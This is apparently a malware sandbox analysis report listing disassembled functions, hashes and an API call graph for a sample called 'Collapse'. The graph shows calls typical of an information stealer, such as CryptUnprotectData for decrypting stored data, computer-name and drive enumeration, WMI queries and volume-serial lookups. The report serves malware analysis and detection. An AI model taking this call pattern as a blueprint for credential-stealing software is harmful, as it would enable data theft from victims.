                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 30410ee0d5689d451a31ce1b71d0c4688d22ba844b76b4dea74fd0fbfbef766b
                                                                                                        • Instruction ID: f83ada55bd7102be833cb29019b3858564928ff421068f3ab6f9ae0ecfa93734
                                                                                                        • Opcode Fuzzy Hash: 30410ee0d5689d451a31ce1b71d0c4688d22ba844b76b4dea74fd0fbfbef766b
                                                                                                        • Instruction Fuzzy Hash: 8021AE71608207AFDF20AFAD8C81E6A77ADBF803A47154924F91AD7251EB31EC5087A0
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 009A1F84
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A1FBC
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A1FDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 158306478-0
                                                                                                        • Opcode ID: f1aa585e3ac33a956454ea1e7a69e9c12e5bf7ca9bb3737ba74a55f4e4604511
                                                                                                        • Instruction ID: e01db617dc2de96ac16ee31e0b56fa74c191796400b66a2f66a613be6e4482fc
                                                                                                        • Opcode Fuzzy Hash: f1aa585e3ac33a956454ea1e7a69e9c12e5bf7ca9bb3737ba74a55f4e4604511
                                                                                                        • Instruction Fuzzy Hash: 3D1192B2509629BFAB3127B95C8DD7F696CDE8B3A57110525F805D2142FB34CD01E1F2
                                                                                                        APIs
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982A8D
                                                                                                        • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00981C8B), ref: 00982A9B
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982AB4
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982AF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2261580123-0
                                                                                                        • Opcode ID: cce1503e1743435a8ac332bba8a8c3d98bcfa7a1707000b00079946d36e5fcb1
                                                                                                        • Instruction ID: 5a54e0038e347982ea2b8f78912c3a7d4cfdf97bf568912884ca40a62027f2ac
                                                                                                        • Opcode Fuzzy Hash: cce1503e1743435a8ac332bba8a8c3d98bcfa7a1707000b00079946d36e5fcb1
                                                                                                        • Instruction Fuzzy Hash: F621B4B4E042098FCB08EFA8C595BAEBBF5AF88300F01845DE459AB391D7389940CF51
                                                                                                        APIs
                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000), ref: 009AA487
                                                                                                        • GetLastError.KERNEL32(?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?,?,?,009A2DF7,?), ref: 009AA493
                                                                                                          • Part of subcall function 009AA4E4: CloseHandle.KERNEL32(FFFFFFFE,009AA4A3,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?,?), ref: 009AA4F4
                                                                                                        • ___initconout.LIBCMT ref: 009AA4A3
                                                                                                          • Part of subcall function 009AA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009AA461,009A993F,?,?,009A34B1,?,00000000,00000000,?), ref: 009AA4D8
                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?), ref: 009AA4B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744216297-0
                                                                                                        • Opcode ID: 0cebcbcb74e3522ce529c8515d68fc93058f9b87c1700318180c61a970f44656
                                                                                                        • Instruction ID: de39ca83087c56a230fb24fdbbe98576912c5c357d8b7b5c73f3b53caca9d4aa
                                                                                                        • Opcode Fuzzy Hash: 0cebcbcb74e3522ce529c8515d68fc93058f9b87c1700318180c61a970f44656
                                                                                                        • Instruction Fuzzy Hash: B1F0F836114625BBCF222F91ED09A897FA6EB8A3B1B014610FA1D95131C772C920FB95
                                                                                                        APIs
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0098EFB9
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0098EFC8
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0098EFD1
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0098EFDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2933794660-0
                                                                                                        • Opcode ID: 39156526d013c5939ddd547706780e8e2e533fc6a3c7fe98834e01bf8bcc8b5a
                                                                                                        • Instruction ID: 02ef57a627ba6cd384518eb4cce8c2ddd8d07963e4147a52715e947db56f303d
                                                                                                        • Opcode Fuzzy Hash: 39156526d013c5939ddd547706780e8e2e533fc6a3c7fe98834e01bf8bcc8b5a
                                                                                                        • Instruction Fuzzy Hash: E1F0B270C5020CEBCB00DFB4CA4898EBBF8EF1C210B914A96A412E7151E730AB44EB50
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                        • Opcode ID: d52fc1e353bc9c61c656d4b68a166f2a4af9bb1a0034f01dcfbed558bb60ff87
                                                                                                        • Instruction ID: ab9a41d79421fe0c98ffbbac8c8084e8548730c990f4f1381dd1dc93f8d8addb
                                                                                                        • Opcode Fuzzy Hash: d52fc1e353bc9c61c656d4b68a166f2a4af9bb1a0034f01dcfbed558bb60ff87
                                                                                                        • Instruction Fuzzy Hash: 4D32C3B49042698FDB14EF64C981B9EFBF1BF88300F0585AAE849A7351D734AA85CF51
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(00000000,?,0099D392), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000,?,?,00000028,00997816), ref: 0099B059
                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0099509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 0099F825
                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0099509A,?,?,?,00000055,?,-00000050,?,?), ref: 0099F85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                        • String ID: utf8
                                                                                                        • API String ID: 943130320-905460609
                                                                                                        • Opcode ID: 888aac03f5e9c7bb09bef247aace0b430ded86655de6a60515a3b5bbb06ea4b3
                                                                                                        • Instruction ID: 8dd2fa465fe721c1bfc98ea383053440a121b6d5761faf21ac3a9327fe599d99
                                                                                                        • Opcode Fuzzy Hash: 888aac03f5e9c7bb09bef247aace0b430ded86655de6a60515a3b5bbb06ea4b3
                                                                                                        • Instruction Fuzzy Hash: D351F672600706BADF24AB7D8C62BABF3ACEF45700F150439F956D7182FB74E94086A1
                                                                                                        APIs
                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0099A6E1,?,?,00000000,00000000,00000000,?), ref: 0099A805
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                        • Opcode ID: dfef1f434b540e33f5edb6d6d9858d116301965bff511b70442060ed286b3869
                                                                                                        • Instruction ID: 8791479af9d9fe44bd555f541679f79658a543d4e769780faacac6cdd32c8f17
                                                                                                        • Opcode Fuzzy Hash: dfef1f434b540e33f5edb6d6d9858d116301965bff511b70442060ed286b3869
                                                                                                        • Instruction Fuzzy Hash: FF418871900209AFCF16DF99CD81AEEBBB9FF48300F1581A9F90567221D3359951DB92
                                                                                                        APIs
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0099A2C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___except_validate_context_record
                                                                                                        • String ID: csm$csm
                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                        • Opcode ID: b5f77af4bfcdce75871b8caad13deba1a10c6d7c40172b03f7f334ae3c141014
                                                                                                        • Instruction ID: 21f2e0c7d103808849ff106f09ec18cfef82a680fefc78a662c42662bfd089ff
                                                                                                        • Opcode Fuzzy Hash: b5f77af4bfcdce75871b8caad13deba1a10c6d7c40172b03f7f334ae3c141014
                                                                                                        • Instruction Fuzzy Hash: 4831CD32400219EBCF228F5CCC429BE7B6AFF49715B18865AF85849221C336DCA1DBC3

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:34.8%
                                                                                                        Total number of Nodes:356
                                                                                                        Total number of Limit Nodes:19
                                                                                                        execution_graph 13774 418c40 13774->13774 13776 418a6f 13774->13776 13775 418c09 CryptUnprotectData 13775->13776 13776->13775 13930 40e002 13931 40e008 13930->13931 13934 4118d0 13931->13934 13933 40e011 13943 4118e9 13934->13943 13935 4118f0 13935->13933 13937 4085b0 ExitProcess 13937->13943 13938 411fa0 RtlExpandEnvironmentStrings 13938->13943 13939 41221b RtlExpandEnvironmentStrings 13939->13943 13940 43c1e0 RtlFreeHeap 13940->13943 13943->13935 13943->13937 13943->13938 13943->13939 13943->13940 13944 43e0f0 LdrInitializeThunk 13943->13944 13945 40ad20 13943->13945 13949 440ef0 13943->13949 13953 441800 13943->13953 13944->13943 13946 40adb0 13945->13946 13946->13946 13948 40add5 13946->13948 13959 43e060 13946->13959 13948->13943 13951 440f10 13949->13951 13950 44108e 13950->13943 13951->13950 13970 43e0f0 LdrInitializeThunk 13951->13970 13955 441820 13953->13955 13954 4419ae 13954->13943 13957 4418bf 13955->13957 13971 43e0f0 LdrInitializeThunk 13955->13971 13957->13954 13972 43e0f0 LdrInitializeThunk 13957->13972 13960 43e086 13959->13960 13961 43e0b1 13959->13961 13962 43e078 13959->13962 13963 43e09f RtlReAllocateHeap 13959->13963 13968 43e098 13959->13968 13969 43e0c7 13959->13969 13965 43c1e0 RtlFreeHeap 13960->13965 13966 43c1c0 RtlAllocateHeap 13961->13966 13962->13960 13962->13961 13962->13963 13963->13968 13964 43c1c0 RtlAllocateHeap 13967 43e0d0 13964->13967 13965->13968 13966->13969 13968->13946 13969->13964 13970->13950 13971->13957 13972->13954 13777 40d643 13783 4095a0 13777->13783 13779 40d64a CoUninitialize 13780 40d670 13779->13780 13781 40dace CoUninitialize 13780->13781 13782 40daf0 13781->13782 13784 4095b4 13783->13784 13784->13779 13785 440ac0 13786 440ad1 13785->13786 13786->13786 13787 440c6f 13786->13787 13795 43e0f0 LdrInitializeThunk 13786->13795 13787->13787 13788 440edb 13787->13788 13796 43c1c0 13787->13796 13791 440d04 13793 440e1f 13791->13793 13799 43e0f0 LdrInitializeThunk 13791->13799 13800 43c1e0 13793->13800 13795->13787 13804 43f530 13796->13804 13798 43c1ca RtlAllocateHeap 13798->13791 13799->13793 13801 43c1f3 13800->13801 13802 43c204 13800->13802 13803 43c1f8 RtlFreeHeap 13801->13803 13802->13788 13803->13802 13805 43f540 13804->13805 13805->13798 13805->13805 13806 4367c7 13807 4367cc 13806->13807 13808 4367ee GetUserDefaultUILanguage 13807->13808 13809 43680f 13808->13809 13973 40cf05 13974 40cf60 13973->13974 13976 43e0f0 LdrInitializeThunk 13974->13976 13976->13974 13810 40c846 CoInitializeEx CoInitializeEx 13812 42c04d 13814 42dc1e 13812->13814 13813 42dcbb GetComputerNameExA 13814->13813 13814->13814 13815 4085d0 13817 4085df 13815->13817 13816 408998 ExitProcess 13817->13816 13818 4085f4 GetCurrentProcessId GetCurrentThreadId 13817->13818 13819 408981 13817->13819 13820 408633 SHGetSpecialFolderPathW 13818->13820 13821 40862d 13818->13821 13832 43e040 13819->13832 13823 4087c0 13820->13823 13821->13820 13823->13823 13824 43c1c0 RtlAllocateHeap 13823->13824 13825 408819 GetForegroundWindow 13824->13825 13827 408895 13825->13827 13827->13819 13829 40b3b0 FreeLibrary 13827->13829 13830 40b3cc 13829->13830 13831 40b3d1 FreeLibrary 13830->13831 13831->13819 13835 43f510 13832->13835 13834 43e045 FreeLibrary 13834->13816 13836 43f519 13835->13836 13836->13834 13977 420012 13979 420030 13977->13979 13979->13979 13982 4412e0 13979->13982 13980 42012f 13981 4412e0 LdrInitializeThunk 13980->13981 13981->13980 13983 441300 13982->13983 13984 44149e 13983->13984 13986 43e0f0 LdrInitializeThunk 13983->13986 13984->13980 13986->13984 13837 43e1d2 13838 43e1e0 13837->13838 13838->13838 13839 43e275 GetForegroundWindow 13838->13839 13840 43e283 13839->13840 13992 40a491 13993 40a4b3 13992->13993 13996 40a870 13993->13996 13997 40a8b0 13996->13997 13998 43c1e0 RtlFreeHeap 13997->13998 13999 40a4bc 13997->13999 13998->13999 14000 43c210 14001 43c230 14000->14001 14003 43c28e 14001->14003 14010 43e0f0 LdrInitializeThunk 14001->14010 14002 43c451 14003->14002 14005 43c1c0 RtlAllocateHeap 14003->14005 14007 43c2fa 14005->14007 14006 43c1e0 RtlFreeHeap 14006->14002 14009 43c36e 14007->14009 14011 43e0f0 LdrInitializeThunk 14007->14011 14009->14006 14010->14003 14011->14009 14012 43ff90 14013 43ffb0 14012->14013 14015 44004e 14013->14015 14022 43e0f0 LdrInitializeThunk 14013->14022 14014 4402bd 14015->14014 14017 43c1c0 RtlAllocateHeap 14015->14017 14018 4400d3 14017->14018 14021 44018e 14018->14021 14023 43e0f0 LdrInitializeThunk 14018->14023 14019 43c1e0 RtlFreeHeap 14019->14014 14021->14019 14022->14015 14023->14021 14024 43041b CoSetProxyBlanket 14025 40d39c 14026 40d3b0 14025->14026 14031 40d42e 14026->14031 14103 43e0f0 LdrInitializeThunk 14026->14103 14027 40d4ee 14028 408b60 ExitProcess 14027->14028 14030 40d521 14028->14030 14059 422870 14030->14059 14031->14027 14104 43e0f0 LdrInitializeThunk 14031->14104 14034 40d527 14035 408b60 ExitProcess 14034->14035 14036 40d53d 14035->14036 14070 422f30 14036->14070 14038 40d543 14039 408b60 ExitProcess 14038->14039 14040 40d559 14039->14040 14077 4231e0 14040->14077 14042 40d55f 14043 408b60 ExitProcess 14042->14043 14044 40d575 14043->14044 14084 426210 14044->14084 14048 40d58d 14099 429750 14048->14099 14050 40d596 14051 408b60 ExitProcess 14050->14051 14052 40d5ac 14051->14052 14053 428150 RtlExpandEnvironmentStrings 14052->14053 14054 40d5b2 14053->14054 14055 408b60 ExitProcess 14054->14055 14056 40d5c8 14055->14056 14057 433510 6 API calls 14056->14057 14058 40d5d7 14057->14058 14060 4228c0 14059->14060 14060->14060 14061 42293e RtlExpandEnvironmentStrings 14060->14061 14062 422980 14061->14062 14063 422b01 14062->14063 14064 4229ef 14062->14064 14065 4229d0 RtlExpandEnvironmentStrings 14062->14065 14066 422a0d 14062->14066 14063->14064 14067 422c81 GetLogicalDrives 14063->14067 14064->14034 14065->14063 14065->14064 14065->14066 14069 4412e0 LdrInitializeThunk 14066->14069 14068 4412e0 LdrInitializeThunk 14067->14068 14068->14064 14069->14063 14071 422fd0 14070->14071 14071->14071 14072 423031 RtlExpandEnvironmentStrings 14071->14072 14075 423080 14072->14075 14073 4402d0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14073->14075 14074 4230fc 14074->14038 14074->14074 14075->14073 14075->14074 14076 4230dd RtlExpandEnvironmentStrings 14075->14076 14076->14074 14076->14075 14078 4231ee 14077->14078 14105 43fe30 14078->14105 14080 4402d0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14082 4230c5 14080->14082 14081 4230fc 14081->14042 14081->14081 14082->14080 14082->14081 14083 4230dd RtlExpandEnvironmentStrings 14082->14083 14083->14081 14083->14082 14086 42624e 14084->14086 14087 42622e 14084->14087 14085 40d584 14094 426610 14085->14094 14086->14085 14088 43c1c0 RtlAllocateHeap 14086->14088 14087->14086 14110 43e0f0 LdrInitializeThunk 14087->14110 14091 4262f4 14088->14091 14090 43c1e0 RtlFreeHeap 14090->14085 14093 42632e 14091->14093 14111 43e0f0 LdrInitializeThunk 14091->14111 14093->14090 14112 426630 14094->14112 14096 426619 14096->14048 14126 439de0 14096->14126 14098 426fb6 14098->14048 14098->14098 14100 4297f0 14099->14100 14100->14100 14101 429889 RtlExpandEnvironmentStrings 14100->14101 14102 4298d0 14101->14102 14102->14102 14103->14031 14104->14027 14106 43fe50 14105->14106 14107 43ff5f 14106->14107 14109 43e0f0 LdrInitializeThunk 14106->14109 14107->14082 14109->14107 14110->14086 14111->14093 14113 426670 14112->14113 14113->14113 14133 43c210 14113->14133 14117 42670e 14121 4267d0 14117->14121 14124 42671a 14117->14124 14147 43ca40 14117->14147 14123 426907 14121->14123 14121->14124 14155 43c980 14121->14155 14123->14096 14125 426fca 14124->14125 14159 43c5d0 14124->14159 14125->14096 14131 439e10 14126->14131 14127 43fe30 LdrInitializeThunk 14127->14131 14129 439fdc 14129->14098 14131->14127 14131->14129 14170 4402d0 14131->14170 14180 440ac0 14131->14180 14190 43e0f0 LdrInitializeThunk 14131->14190 14134 43c230 14133->14134 14136 43c28e 14134->14136 14163 43e0f0 LdrInitializeThunk 14134->14163 14135 426702 14143 43c480 14135->14143 14136->14135 14138 43c1c0 RtlAllocateHeap 14136->14138 14140 43c2fa 14138->14140 14139 43c1e0 RtlFreeHeap 14139->14135 14142 43c36e 14140->14142 14164 43e0f0 LdrInitializeThunk 14140->14164 14142->14139 14144 43c54e 14143->14144 14145 43c491 14143->14145 14144->14117 14145->14144 14165 43e0f0 LdrInitializeThunk 14145->14165 14149 43ca90 14147->14149 14148 43d1fe 14148->14117 14154 43caee 14149->14154 14166 43e0f0 LdrInitializeThunk 14149->14166 14151 43d189 14151->14148 14167 43e0f0 LdrInitializeThunk 14151->14167 14153 43e0f0 LdrInitializeThunk 14153->14154 14154->14148 14154->14151 14154->14153 14156 43c9a0 14155->14156 14156->14156 14157 43ca0e 14156->14157 14168 43e0f0 LdrInitializeThunk 14156->14168 14157->14121 14160 426dfa 14159->14160 14161 43c5da 14159->14161 14160->14096 14161->14160 14169 43e0f0 LdrInitializeThunk 14161->14169 14163->14136 14164->14142 14165->14144 14166->14154 14167->14148 14168->14157 14169->14160 14171 4402e0 14170->14171 14172 44037e 14171->14172 14191 43e0f0 LdrInitializeThunk 14171->14191 14173 4406d7 14172->14173 14174 43c1c0 RtlAllocateHeap 14172->14174 14173->14131 14177 440448 14174->14177 14176 43c1e0 RtlFreeHeap 14176->14173 14179 44050e 14177->14179 14192 43e0f0 LdrInitializeThunk 14177->14192 14179->14176 14181 440ad1 14180->14181 14181->14181 14182 440c6f 14181->14182 14193 43e0f0 LdrInitializeThunk 14181->14193 14182->14182 14183 440edb 14182->14183 14184 43c1c0 RtlAllocateHeap 14182->14184 14183->14131 14186 440d04 14184->14186 14188 440e1f 14186->14188 14194 43e0f0 LdrInitializeThunk 14186->14194 14187 43c1e0 RtlFreeHeap 14187->14183 14188->14187 14190->14131 14191->14172 14192->14179 14193->14182 14194->14188 13841 43e7de 13843 43e74d 13841->13843 13842 43e831 13843->13842 13846 43e0f0 LdrInitializeThunk 13843->13846 13845 43e852 13846->13845 14195 40e11f 14196 40e130 14195->14196 14199 438c90 14196->14199 14198 40e24c 14198->14198 14200 438cc0 CoCreateInstance 14199->14200 14202 439240 14200->14202 14203 438e4e SysAllocString 14200->14203 14205 439254 GetVolumeInformationW 14202->14205 14206 438f06 14203->14206 14212 43926b 14205->14212 14207 43922f SysFreeString 14206->14207 14208 438f0e CoSetProxyBlanket 14206->14208 14207->14202 14209 439225 14208->14209 14210 438f2e SysAllocString 14208->14210 14209->14207 14213 439000 14210->14213 14212->14198 14213->14213 14214 439045 SysAllocString 14213->14214 14217 43906f 14214->14217 14215 439213 SysFreeString SysFreeString 14215->14209 14216 439209 14216->14215 14217->14215 14217->14216 14218 4390b3 VariantInit 14217->14218 14220 439100 14218->14220 14219 4391f8 VariantClear 14219->14216 14220->14219 14221 4379a2 14222 4379b9 14221->14222 14224 437a70 14222->14224 14225 43e0f0 LdrInitializeThunk 14222->14225 14225->14222 13847 4388e0 13848 438900 13847->13848 13850 438a28 13848->13850 13856 43e0f0 LdrInitializeThunk 13848->13856 13852 438c1e 13850->13852 13853 438b2e 13850->13853 13855 43e0f0 LdrInitializeThunk 13850->13855 13853->13852 13857 43e0f0 LdrInitializeThunk 13853->13857 13855->13853 13856->13850 13857->13852 13858 4104e7 13859 4104ec 13858->13859 13860 41074b RtlExpandEnvironmentStrings 13859->13860 13864 40ee9f 13859->13864 13865 4107af 13860->13865 13862 410d8f 13871 4146d0 13862->13871 13865->13864 13866 408b60 13865->13866 13886 4085b0 ExitProcess 13866->13886 13868 408ba3 13870 408bec 13868->13870 13887 4085b0 ExitProcess 13868->13887 13870->13862 13872 4146f0 13871->13872 13872->13872 13888 4410f0 13872->13888 13874 41487d 13875 4148a5 13874->13875 13876 414906 13874->13876 13879 414a88 13874->13879 13880 4148c3 13874->13880 13884 4148f7 13874->13884 13898 4414f0 13874->13898 13878 4414f0 LdrInitializeThunk 13875->13878 13876->13864 13878->13880 13879->13876 13879->13879 13902 43e0f0 LdrInitializeThunk 13879->13902 13880->13876 13880->13879 13880->13884 13892 441600 13880->13892 13882 4414f0 LdrInitializeThunk 13882->13884 13884->13876 13884->13879 13884->13882 